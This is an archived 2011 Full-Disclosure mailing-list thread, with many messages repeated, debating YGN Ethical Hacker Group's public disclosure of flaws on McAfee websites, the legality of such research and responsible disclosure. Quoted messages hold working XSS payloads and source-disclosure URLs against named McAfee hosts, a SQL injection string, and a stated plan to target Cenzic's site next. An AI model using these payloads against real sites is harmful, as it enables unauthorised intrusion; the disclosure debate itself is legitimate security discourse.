Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[MustLive]

Hello YGN Ethical Hacker Group!

Just after you've disclosed your finding at McAfee's sites, I have
congratulated you with nice disclosure and started to wait for reaction.

And few days later I've read in Network World few articles about this issue
(http://www.networkworld.com/news/2011/032811-mcafee-security-holes.html and
http://www.networkworld.com/news/2011/033011-hackers-ygn-mcafee.html). So
the reaction and buzz have came quickly. And in large scale - as simple
google dork shows there are a lot of sites (up to 128000 results) posted
this news.

Mostly it's reposting of the same news, but still large attention to your
disclosure. In February in our conversation I told that publishing of the
video about holes at McAfee's sites would must bring attention, but in this
case most attention was brought by disclosure in FD mailing list :-) (and a
lot of attention). But that video can still come in handy for creating even
more buzz about this issue.

The most important thing in all this news articles is that they are claiming
about defying of USA law. All these journalists and news copy-pasters are
not familiar with laws (USA laws in particular), so they're just incorrectly
blaming on YGN Ethical Hacker Group. As I wrote in 2009 in my article
Hacking of web sites, security researches, disclosure and legislation
(http://websecurity.com.ua/articles/security_researches_and_legislation/eng/),
which was published in The Web Security Mailing List, particularly in item 5
of the article (where I wrote about legislations of Ukraine and USA),
security researches, including finding and disclosing of vulnerabilities at
web sites, are legal. So journalists must first get familiar with their own
legislation, before writing such articles with such incorrect statements
about other people.

P.S.

Cenzic is hole-loving company - earlier I wrote in my news about hole in
their site's search engine which I found in 2006. And it's quite possible
that from that time they haven't came far away from such approach. So I wish
you good luck in your quest for Cenzic's holes ;-).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

Vulnerabilities in *McAfee.com
From: YGN Ethical Hacker Group 
Date: Mon, 28 Mar 2011 00:02:47 +0800

Vulnerabilities in *McAfee.com

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

+1.

I've come across countless companies who had idiotic technical directors who
didn't even want you speaking up in meetings about how bad their network
was, let alone in public.

A lot of it comes down to pride/image, if someone starts questioning their
job worth, they get all pissy about it, plus a lot of people find it
*extremely* difficult to take constructive criticism and/or advice
within their own remit.

Personally, I'm completely honest and open when I fuck something up. If a
clients network goes down cos I accidently plugged a 12v cable tester into
core switch gear causing a site wide telecoms outage for 20 minutes (lol),
I'll come right out and say "Yeah, I did bad.". Where as most people try and
cover it up.

Different scenario, but same principle.

On Thu, Mar 31, 2011 at 1:13 PM, BlackHawk  wrote:

> Nothing new under the sun.. i have done some security testing on _open
> source_ webapps, and most of the time
> if you allert the publisher of your founding ( most of the time remote
> code executions, not "boring" XSS ) the answer is tipically "F*** off,
> we do not need your help / you are lying / you are a criminal /
> etc.etc." showing that bug founding is still looked with diffidence
> from many people;
>
> on the other side admins are so proud of themselfs that they do not
> want  other people to know they have bad coded something, look at
> this:
> http://forums.pligg.com/questions-comments/23065-pligg-1-1-3-security-vulnerabilities.html#post103328
>
> to close with a semi-serious joke: put all this together and you will
> know why black market selling of exploit is increasing his size: at
> least someone will appreciate your work and eventually recompensate
> you for it..
>
> On Wed, Mar 30, 2011 at 9:33 PM, Cal Leeming  wrote:
> >
> >
> >
> > Like with most laws, the key point is "intent". If your intention was
> > clearly not malicious, then you are safe.
>
>
>
> --
> BlackHawk - hawkgot...@gmail.com
>
> Sent with Gmail
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[coderman]

On Thu, Mar 31, 2011 at 3:30 PM,   wrote:
> ...
> Ask Randall Schwartz how that worked out for him. "intent" doesn't
> enter into it as much as a defendant may like.

intel has a long history of strong arming legal strong-arming against
those who provoke the beast's wrath.

it doesn't help that ORS 164.377 is overly broad for selective
prosecution; factor in the InfraGard partnership direct-line with
technical and economic clout and you've got influence over legal
levers too large and plentiful to resist beating convenient targets
with. so perhaps this example is not most representative of the
typical and certainly not to title 18.


as for agro intel some early indicators are they have improved on this
posture. i hope they keep it up.


by the way Intel Corp., i'm still waiting on that apology for the
internal smearing in the company newsletter to pimp centrino security
and fear monger wifi back in the day. if you're truly sorry you could
cover the cost of compromised equipment from the black bag you sabre
rattled for. :/
call me!



[ not holding my breath... ]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Thor (Hammer of God)]

I should clarify my use of "intent" in previous replies - 

The "intent" part of the process would be from the judges point of view even in 
the absence of "concrete" evidence.   As you know, actual court cases are not 
what we see on TV, and the judge has far more power than one may think.  Even 
if the defense argues that the actions by the defendant were acceptable, if the 
judge thinks that the intent of the individual was to exceed access, then they 
are hosed.

It wasn't meant to imply that saying "I didn't intend to bring their network 
down" would be of any benefit to a defendant. 

t

-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of 
valdis.kletni...@vt.edu
Sent: Thursday, March 31, 2011 3:30 PM
To: Cal Leeming
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, 30 Mar 2011 20:33:56 BST, Cal Leeming said:
> Like with most laws, the key point is "intent". If your intention was 
> clearly not malicious, then you are safe.

Ask Randall Schwartz how that worked out for him. "intent" doesn't enter into 
it as much as a defendant may like.

http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html

Intent is not mentioned at all.  You exceed the authorized access, you're 
guilty under 18 USC 1030.  1030 (a)(2)(C) is the really expansive one, as 
"protected computer" is defined down in (e)(2)(B) to include anything used in 
interstate commerce (and yes, DA's *HAVE* argued "The computer has a web 
browser and thus could get to amazon.com, so it's interstate commerce time").

Doesn't matter if you were trying to save the world at the time (as Gary 
McKinnon found out).

A better approach is to argue the definition of "authorized access" as it 
applies to an Internet-facing server...

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Valdis . Kletnieks]

On Wed, 30 Mar 2011 20:33:56 BST, Cal Leeming said:
> Like with most laws, the key point is "intent". If your intention was
> clearly not malicious, then you are safe.

Ask Randall Schwartz how that worked out for him. "intent" doesn't
enter into it as much as a defendant may like.

http://www.law.cornell.edu/uscode/html/uscode18/usc_sec_18_1030000-.html

Intent is not mentioned at all.  You exceed the authorized access, you're
guilty under 18 USC 1030.  1030 (a)(2)(C) is the really expansive one, as
"protected computer" is defined down in (e)(2)(B) to include anything used in
interstate commerce (and yes, DA's *HAVE* argued "The computer has a web
browser and thus could get to amazon.com, so it's interstate commerce time").

Doesn't matter if you were trying to save the world at the time (as Gary
McKinnon found out).

A better approach is to argue the definition of "authorized access" as it 
applies
to an Internet-facing server...


pgptNaZ6sPlTc.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Valdis . Kletnieks]

On Thu, 31 Mar 2011 15:18:08 BST, Jacqui Caren-home said:
> A lot of businesses do not consider "constructive criticism" as positive and
> will sometimes do everything in thier power to "PR" you to death - its
> often seen as cheaper than fixing the problem.

In fact, it often *is* cheaper than actually fixing the problem (especially
when the reported problem is "3 pages are vulnerable to XSS", but the
actual problem is "48,394 pages are vulnerable to XSS" or similar).



pgpyNmLOmxyW5.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Jacqui Caren-home]

On 31/03/2011 13:13, BlackHawk wrote:
> to close with a semi-serious joke: put all this together and you will
> know why black market selling of exploit is increasing his size: at
> least someone will appreciate your work and eventually recompensate
> you for it..

Everyone makes mistakes. Being unable to admit fault is a serious character
flaw for a developer. However for a business, this may be a commercially
sensible strategy.

A long time ago I was asked to demo a MAC web server memory leak to a .mil
address. I declined but provided the details and test script to the contact
and left him to run his own tests. The server turned into a linux box a few
months later. My worry was my demo would be construed as an attack by his
"higher ups".

A lot of businesses do not consider "constructive criticism" as positive and
will sometimes do everything in thier power to "PR" you to death - its
often seen as cheaper than fixing the problem.

Jacqui

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[BlackHawk]

Nothing new under the sun.. i have done some security testing on _open
source_ webapps, and most of the time
if you allert the publisher of your founding ( most of the time remote
code executions, not "boring" XSS ) the answer is tipically "F*** off,
we do not need your help / you are lying / you are a criminal /
etc.etc." showing that bug founding is still looked with diffidence
from many people;

on the other side admins are so proud of themselfs that they do not
want  other people to know they have bad coded something, look at
this: 
http://forums.pligg.com/questions-comments/23065-pligg-1-1-3-security-vulnerabilities.html#post103328

to close with a semi-serious joke: put all this together and you will
know why black market selling of exploit is increasing his size: at
least someone will appreciate your work and eventually recompensate
you for it..

On Wed, Mar 30, 2011 at 9:33 PM, Cal Leeming  wrote:
>
>
>
> Like with most laws, the key point is "intent". If your intention was
> clearly not malicious, then you are safe.



-- 
BlackHawk - hawkgot...@gmail.com

Sent with Gmail

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

On Wed, Mar 30, 2011 at 8:29 PM, Ryan Sears  wrote:

>
> How about the scenario in which one statically audit's some javascript
> sitting on a site, to notice it does something in an unsafe manner, and can
> be used in a XSS attack without actually making it happen?. There was no
> actual 'attacking' done, but there was still a vulnerability discovered. Is
> THAT considered an illegal act? Is putting a '<3' into a web form/comment
> section considered attacking it if you look at the source to see how the
> character translated? What if you just wanted to make an ascii heart? My
> point is it's a very blurry line, and there are a lot of scenarios where one
> may discover a vulnerability without even having to do anything.
>

Like with most laws, the key point is "intent". If your intention was
clearly not malicious, then you are safe.


>
> As for the source code disclosures, there was absolutely no 'attacking'
> done. This was a huge oversight in the site devs, and they were giving that
> information to anyone who requested it, plain and simple. What about the
> Tumblr incident that happened a while ago? Just because they screwed up a
> production script, they ended up leaking massive amounts of internal
> infrastructure details, as well as private API keys, and other stuff that
> could be used for nefarious means. Is it illegal to visit that page? I think
> not, as THEY were putting the information out there (albeit by accident),
> but I as a user have no way to know that.
>
> I understand what you're saying about them not asking people to look for
> bugs, but it IS the internet. Companies don't typically ask external people
> to audit their executables either, but people do it for a number of reasons
> (mainly education).
>
> If they leave their site up, people will potentially poke at it. That's
> just the way it is. If I have a vested interest in a company (be it monetary
> or simply supporting it's cause), I personally want to see the site
> flourish, because I am then a part of that site. I want to make sure that my
> personal information is protected, and if I do find a bug somewhere, I
> report it. I recently found a XSS in OpenDNS's landing page, and they were
> very appreciative, very professional, and prompt to respond. This made me
> WANT to work with them further to ensure that their infrastructure was
> hardened to other forms of attack as well. I don't disclose these sorts of
> issues publicly, because I give the developers a chance to fix it, and in my
> past experience most companies are happy that I reported an issue, because I
> could have just as easily not said anything. If it does come down to it
> though, I follow my own public disclosure policy (
> http://talesofacoldadmin.com/disclosure.html) based off Rain Forest
> Puppy's. It basically just asks for somewhat consistent lines of
> communication after I disclose something. If the communication drops (or is
> non-existent), then it's at my own discretion to disclose it in a public
> forum.
>
> I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but
> if choosing to disclose something (even in private) means potential legal
> troubles, then that takes away the motivation for me to disclose it in any
> form. I'm still going to be finding bugs for my own educational purposes,
> but I'll just stop disclosing them. That in itself starts to undermine the
> internet as a whole, leading to the restriction of information exchange,
> which is appalling.
>
> It IS technically illegal to do these sorts of tests without consent, but
> at what point DOES it become a 'test'? There's some cases, granted, in which
> the intention is clear (testing for blind SQL injections, etc) as they leave
> a huge footprint, but there's no explicitly clear line in which it becomes
> illegal. Is adding a ' to my name illegal? What if my 70+ year old
> grandmother did it by accident? Could she be persecuted as well? You can't
> apply the law to only some situations and not others.
>
> I also point you to one of my favorite XKCD's => http://xkcd.com/327/
>
> Is naming your kid something like that technically illegal? Then that
> starts getting into free-speech issues, which are most certainly protected
> by the constitution. If I want my name to be "Ann  Hero", and
> the site doesn't explicitly tell me I can't do so, then how can I be
> expected to reasonably know where their boundaries are? I don't see any
> terms of use for using their website anywhere.
>
> This is all just my opinion though, and sorry for the long message!
>
> Ryan
>
> - Origina

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

An interesting notion.

I have to say their mailing list comment didn't exactly shine with
professionalism, but there again, nor do mine. So I dunno :p

On Wed, Mar 30, 2011 at 9:10 PM, andrew.wallace <
andrew.wall...@rocketmail.com> wrote:

> Guys,
>
> Is it because these are Burmese hackers as to why everyone is getting in a
> pickle, e.g eastern hackers attacking western companies? I feel an Obama
> moment coming on, where he condemns the group known as YGN.
>
> Andrew
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Cal Leeming]

Ohh now I get it. I thought they had just copy and pasted someone else.

My response is now: LOLOLOLOL.

On Wed, Mar 30, 2011 at 4:22 PM, Thor (Hammer of God)
wrote:

> Let's see here... As an "ethical hacker group," you don't like being
> criticized by someone as engaging in illegal activities, so you announce on
> a public site that you are going to attack the company?   Brilliant.
> t
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk [mailto:
> full-disclosure-boun...@lists.grok.org.uk] On Behalf Of YGN Ethical Hacker
> Group
> Sent: Wednesday, March 30, 2011 5:44 AM
> To: Pablo Ximenes
> Cc: full-disclosure
> Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
> According to xssed.com,  there are two remaining XSS issues:
>
> https://kb.mcafee.com/corporate/index?page=content&id=";; alert(1); //
> https://kc.mcafee.com/corporate/index?page=content&id=";; alert(1); //
>
>
> You guys know our disclosed issues are very simple and can easily be found
> through viewing HTML/JS source codes and simple Google Hacking (
> http://www.google.com/search?q=%22%3C%25+Dim++site%3Adownload.mcafee.com).
>
> However,  it was criticized as 'illegal break-in' by Cenzic's CMO,
> http://www.cenzic.com/company/management/khera/,  according to Network
> World News editor - Ellen Messmer.  Thus, the next target is Cenzic web
> site. Let's see how strong the Kung-Fu of Cenzic HailStorm scanner is.
>
>
> -
> Best regards,
> YGN Ethical Hacker Group
> Yangon, Myanmar (Burma)
> http://yehg.net
> Our Lab | http://yehg.net/lab
> Our Directory | http://yehg.net/hwd
>
>
>
>
> On Tue, Mar 29, 2011 at 9:01 PM, Pablo Ximenes  wrote:
> > FIY
> >
> > http://it.slashdot.org/story/11/03/28/209230/McAfees-Website-Full-of-S
> > ecurity-Holes
> >
> >
> > Pablo Ximenes
> > http://ximen.es/
> > http://twitter.com/pabloximenes
> >
> >
> >
> >
> > 2011/3/28 Pablo Ximenes :
> >> blog post about this: http://ximen.es/?p=469
> >>
> >> Please, don't throw stones at me.
> >>
> >> []'s
> >>
> >>
> >> Pablo Ximenes
> >> http://ximen.es/
> >> http://twitter.com/pabloximenes
> >>
> >>
> >>
> >> 2011/3/27 YGN Ethical Hacker Group 
> >>>
> >>> Vulnerabilities in *McAfee.com
> >>>
> >>>
> >>> 1. VULNERABILITY DESCRIPTION
> >>>
> >>> -> Cross Site Scripting
> >>>
> >>> http://download.mcafee.com/products/webhelp/4/1033/#javascript:top.l
> >>> ocation.replace('attacker.in')
> >>>
> >>> -> Information Disclosure > Internal Hostname:
> >>>http://www.mcafee.com/js/omniture/omniture_profile.js
> >>>
> >>>($ ruby host-extract.rb -a
> >>> http://www.mcafee.com/js/omniture/omniture_profile.js)
> >>>
> >>> -> Information Disclosure > Source Code Disclosure:
> >>>
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/coo
> >>> kiecommon.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/app
> >>> common.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/clinic/includes/commoninc/par
> >>> tnerCodesLibrary.asp
> >>>
> >>> view-source:http://download.mcafee.com/clinic/Includes/common.asp
> >>>
> >>> view-source:http://download.mcafee.com/updates/upgrade_patches.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/updates/common/dat_common.asp
> >>>view-source:http://download.mcafee.com/updates/updates.asp
> >>>view-source:http://download.mcafee.com/updates/superDat.asp
> >>>view-source:http://download.mcafee.com/eval/evaluate2.asp
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/conditionals.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/errHandler_soft.as
> >>> p
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/variables.asp
> >>>
> >>>
> >>> view-source:http://download.mcafee.com/common/ssi/standard/oem/oem_c
> >>> ontrols.asp
> >>>
> >>> view-source:http://do

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[YGN Ethical Hacker Group]

Thanks for all your inputs and discussions.

We believe keeping these information as secret is unethical and irresponsible.



For those who think/criticize we're unethical /illegal,

there is so-called "Passive Scanning" technique in security testing.

Passive scanning (a.k.a Passive Reconnaissance) is basically examining
web site work flows and its involved source codes for identifying
vulnerabilities without ever attacking the target itself.

Contrary to what most of people think, passive scanning allows
everyone to audit any web sites without breaking the laws and without
alarming firewalls in-front.

Basically it starts as:

1. Do Google Hacking and look for potential information leakage. (Most
of the tools allow you to add your own GH Dorks).

2. Browse the target web site with a scanner that has passive
vulnerability scanning capability -  ratproxy, zaproxy, webscarab,
fiddler+watcher,/ burp-pro or you name it
Also use meta data extraction tools. And look for potential
information leakage & others

3. Examine all contents of JavaScript & decompiled Flash/Silverlight/Java Applet

4. Look for common vulnerable points and mis-uses
e.g., for JS files, examine calls like document.URLUnencoded,
document.referer, document.location, window.location,
location.href,document.URL ...etc


Passive scan is just a small subset of assessment realm. Findings are
very limited.

Our recent disclosure of Plesk open redirect flaw was a result from
purely passive scan on a static HTML web site -
http://yehg.net/lab/pr0js/advisories/%5Bplesk_7.0-8.2%5D_open_url_redirection

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Ryan Sears]

Agreed, If you put your site on the open internet, you have to take into 
account the inherent hostilities that go along with that action. 

A security firm like Mcafee /knows/ about these vulnerabilities. Guaranteed. If 
they offer services to make other's sites 'hacker proof', their first order of 
business should make sure that their infrastructure doesn't have blatantly 
obvious security holes. I'm not saying that they should catch EVERYTHING, but 
these are bugs that an automated scanner could easily pick up. I do understand 
that  a large infrastructure like theirs has pages that have been created by 
people with varying degrees of competence, but that's why they need to do 
inclusive penetration tests of their own network. At the very least they need 
to have some mechanism in place to detect (and possibly defer) these sorts of 
attacks. 

The way I see it, when a company hides behind legal threats to deter people 
from finding and reporting bugs, all they're doing is hurting themselves. Look 
at how Microsoft has turned around. 10 years ago they weren't dealing with 
people reporting issues in the right way, but they soon came to realize that by 
listening to the hackers that ARE coming forward with issues, they not only 
help themselves, but help the community as well. It's a win/win scenario for 
EVERYONE. 

You can tell a vast amount about how an infrastructure is run from just a bit 
of poking. If there are blatant security holes everywhere, then they clearly 
don't take security seriously. If they filter for SQL injections in javascript, 
then the dev's have no clue what they're actually trying to do. If you see SQL 
errors, chances are there are more serious issues to boot. I usually limit my 
poking to the very basic of basics when I do use a new service, and the more 
transparent they are (think reddit) the more I trust them. They even have a 
full subreddit devoted to finding and learning about XSS attacks. One word, 
awesome. 

Simply put, in my opinion you can't blame a pen-tester for looking for bugs in 
a site. The only time it should be considered malicious is when it's used in a 
malicious way. If I find a XSS in a webform, and I report it along with 
re-mediation suggestions I feel as though I'm doing the site a favor. It's 
unfortunate to think that some see this as a criminal activity. 

Ryan

- Original Message -
From: "Jeffrey Walton" 
To: "Thor (Hammer of God)" 
Cc: "Ryan Sears" , "full-disclosure" 

Sent: Wednesday, March 30, 2011 5:28:59 PM GMT -05:00 US/Canada Eastern
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
 wrote:
> I have that very strip printed and on the wall in my office :)    You make 
> several points, but the response that immediately comes to mind is that I 
> actually see a difference between actively scanning content for 
> structural/coding vulnerabilities, and entering data in a search box.  I 
> don't know if there is any basis for this legally, but I feel that if you put 
> a box up and I can search for something, then I can put whatever I want in 
> that box.  You (the royal you) are basically soliciting people to put data in 
> the box.   However, you are not asking anyone to spider your site or run 
> scans against it.
>
If a person or company places a host on the public internet and offers
a service, I don't think its reasonable to claim some input is "fair"
and other input is "unfair". Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' is cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Jeffrey Walton]

On Wed, Mar 30, 2011 at 4:36 PM, Thor (Hammer of God)
 wrote:
> I have that very strip printed and on the wall in my office :)    You make 
> several points, but the response that immediately comes to mind is that I 
> actually see a difference between actively scanning content for 
> structural/coding vulnerabilities, and entering data in a search box.  I 
> don't know if there is any basis for this legally, but I feel that if you put 
> a box up and I can search for something, then I can put whatever I want in 
> that box.  You (the royal you) are basically soliciting people to put data in 
> the box.   However, you are not asking anyone to spider your site or run 
> scans against it.
>
If a person or company places a host on the public internet and offers
a service, I don't think its reasonable to claim some input is "fair"
and other input is "unfair". Perhaps the person or company should not
offer public services in the first place.

It seems reasonable (to me) that users of the site expect that the
site is relatively defect free and secure. A tech-savy user who tests
the site through its public interface is simply exercising due
diligence before using the services of the site. I personally feel
that individuals and companies which want to criminalize 'due
diligence' is cowardly at best. I don't want to use the services of
such a site; nor do I want to have an account on such a system.

Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Thor (Hammer of God)]

I have that very strip printed and on the wall in my office :)You make 
several points, but the response that immediately comes to mind is that I 
actually see a difference between actively scanning content for 
structural/coding vulnerabilities, and entering data in a search box.  I don't 
know if there is any basis for this legally, but I feel that if you put a box 
up and I can search for something, then I can put whatever I want in that box.  
You (the royal you) are basically soliciting people to put data in the box.   
However, you are not asking anyone to spider your site or run scans against it. 
 

That said, my guess is that it would all come down to intent.  If I put ' or 
1=1-- (like the site I had that some camper sniped) in, it's a pretty sure bet 
that I'm looking for SQL injection.  But I don't know if the search box 
"entitles" me to do that.  It certainly is interesting list fodder though...  

>-Original Message-
>From: Ryan Sears [mailto:rdse...@mtu.edu]
>Sent: Wednesday, March 30, 2011 12:30 PM
>To: Thor (Hammer of God)
>Cc: full-disclosure; noloa...@gmail.com
>Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com
>
>
>How about the scenario in which one statically audit's some javascript sitting
>on a site, to notice it does something in an unsafe manner, and can be used in
>a XSS attack without actually making it happen?. There was no actual
>'attacking' done, but there was still a vulnerability discovered. Is THAT
>considered an illegal act? Is putting a '<3' into a web form/comment section
>considered attacking it if you look at the source to see how the character
>translated? What if you just wanted to make an ascii heart? My point is it's a
>very blurry line, and there are a lot of scenarios where one may discover a
>vulnerability without even having to do anything.
>
>As for the source code disclosures, there was absolutely no 'attacking' done.
>This was a huge oversight in the site devs, and they were giving that
>information to anyone who requested it, plain and simple. What about the
>Tumblr incident that happened a while ago? Just because they screwed up a
>production script, they ended up leaking massive amounts of internal
>infrastructure details, as well as private API keys, and other stuff that 
>could be
>used for nefarious means. Is it illegal to visit that page? I think not, as 
>THEY
>were putting the information out there (albeit by accident), but I as a user
>have no way to know that.
>
>I understand what you're saying about them not asking people to look for
>bugs, but it IS the internet. Companies don't typically ask external people to
>audit their executables either, but people do it for a number of reasons
>(mainly education).
>
>If they leave their site up, people will potentially poke at it. That's just 
>the way
>it is. If I have a vested interest in a company (be it monetary or simply
>supporting it's cause), I personally want to see the site flourish, because I 
>am
>then a part of that site. I want to make sure that my personal information is
>protected, and if I do find a bug somewhere, I report it. I recently found a 
>XSS
>in OpenDNS's landing page, and they were very appreciative, very
>professional, and prompt to respond. This made me WANT to work with them
>further to ensure that their infrastructure was hardened to other forms of
>attack as well. I don't disclose these sorts of issues publicly, because I 
>give the
>developers a chance to fix it, and in my past experience most companies are
>happy that I reported an issue, because I could have just as easily not said
>anything. If it does come down to it though, I follow my own public disclosure
>policy (http://talesofacoldadmin.com/disclosure.html) based off Rain Forest
>Puppy's. It basically just asks for somewhat consistent lines of communication
>after I disclose something. If the communication drops (or is non-existent),
>then it's at my own discretion to disclose it in a public forum.
>
>I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if
>choosing to disclose something (even in private) means potential legal
>troubles, then that takes away the motivation for me to disclose it in any
>form. I'm still going to be finding bugs for my own educational purposes, but
>I'll just stop disclosing them. That in itself starts to undermine the 
>internet as a
>whole, leading to the restriction of information exchange, which is appalling.
>
>It IS technically illegal to do these sorts of tests without consent, but at 
>what
>point DOES it become a 'test'? There's some cases, granted, in which the
>intention is cl

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Thor (Hammer of God)]

Nah, not from my POV anyway…   I’m not concerned with who is attacking whom 
from where – I just tend to say something when people claim to be “ethical 
hackers” but then say they are going to target a security company because they 
criticizing the group for targeting people.   It seems redundantly ironic.  Or 
would that be ironically redundant?
t

From: andrew.wallace [mailto:andrew.wall...@rocketmail.com]
Sent: Wednesday, March 30, 2011 1:10 PM
To: noloa...@gmail.com; n...@myproxylists.com; c...@foxwhisper.co.uk; 
pa...@ximen.es; m...@b3nji.com; Thor (Hammer of God); uuf6...@gmail.com; 
rdse...@mtu.edu
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Vulnerabilities in *McAfee.com

Guys,

Is it because these are Burmese hackers as to why everyone is getting in a 
pickle, e.g eastern hackers attacking western companies? I feel an Obama moment 
coming on, where he condemns the group known as YGN.

Andrew
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Vulnerabilities in *McAfee.com

[Ryan Sears]

How about the scenario in which one statically audit's some javascript sitting 
on a site, to notice it does something in an unsafe manner, and can be used in 
a XSS attack without actually making it happen?. There was no actual 
'attacking' done, but there was still a vulnerability discovered. Is THAT 
considered an illegal act? Is putting a '<3' into a web form/comment section 
considered attacking it if you look at the source to see how the character 
translated? What if you just wanted to make an ascii heart? My point is it's a 
very blurry line, and there are a lot of scenarios where one may discover a 
vulnerability without even having to do anything.

As for the source code disclosures, there was absolutely no 'attacking' done. 
This was a huge oversight in the site devs, and they were giving that 
information to anyone who requested it, plain and simple. What about the Tumblr 
incident that happened a while ago? Just because they screwed up a production 
script, they ended up leaking massive amounts of internal infrastructure 
details, as well as private API keys, and other stuff that could be used for 
nefarious means. Is it illegal to visit that page? I think not, as THEY were 
putting the information out there (albeit by accident), but I as a user have no 
way to know that. 

I understand what you're saying about them not asking people to look for bugs, 
but it IS the internet. Companies don't typically ask external people to audit 
their executables either, but people do it for a number of reasons (mainly 
education). 

If they leave their site up, people will potentially poke at it. That's just 
the way it is. If I have a vested interest in a company (be it monetary or 
simply supporting it's cause), I personally want to see the site flourish, 
because I am then a part of that site. I want to make sure that my personal 
information is protected, and if I do find a bug somewhere, I report it. I 
recently found a XSS in OpenDNS's landing page, and they were very 
appreciative, very professional, and prompt to respond. This made me WANT to 
work with them further to ensure that their infrastructure was hardened to 
other forms of attack as well. I don't disclose these sorts of issues publicly, 
because I give the developers a chance to fix it, and in my past experience 
most companies are happy that I reported an issue, because I could have just as 
easily not said anything. If it does come down to it though, I follow my own 
public disclosure policy (http://talesofacoldadmin.com/disclosure.html) based 
off Rain Forest Puppy's. It basically just asks for somewhat consistent lines 
of communication after I disclose something. If the communication drops (or is 
non-existent), then it's at my own discretion to disclose it in a public forum. 

I don't HAVE to disclose anything to anyone, I CHOOSE to disclose it, but if 
choosing to disclose something (even in private) means potential legal 
troubles, then that takes away the motivation for me to disclose it in any 
form. I'm still going to be finding bugs for my own educational purposes, but 
I'll just stop disclosing them. That in itself starts to undermine the internet 
as a whole, leading to the restriction of information exchange, which is 
appalling. 

It IS technically illegal to do these sorts of tests without consent, but at 
what point DOES it become a 'test'? There's some cases, granted, in which the 
intention is clear (testing for blind SQL injections, etc) as they leave a huge 
footprint, but there's no explicitly clear line in which it becomes illegal. Is 
adding a ' to my name illegal? What if my 70+ year old grandmother did it by 
accident? Could she be persecuted as well? You can't apply the law to only some 
situations and not others. 

I also point you to one of my favorite XKCD's => http://xkcd.com/327/

Is naming your kid something like that technically illegal? Then that starts 
getting into free-speech issues, which are most certainly protected by the 
constitution. If I want my name to be "Ann  Hero", and the site 
doesn't explicitly tell me I can't do so, then how can I be expected to 
reasonably know where their boundaries are? I don't see any terms of use for 
using their website anywhere. 

This is all just my opinion though, and sorry for the long message!

Ryan

- Original Message -
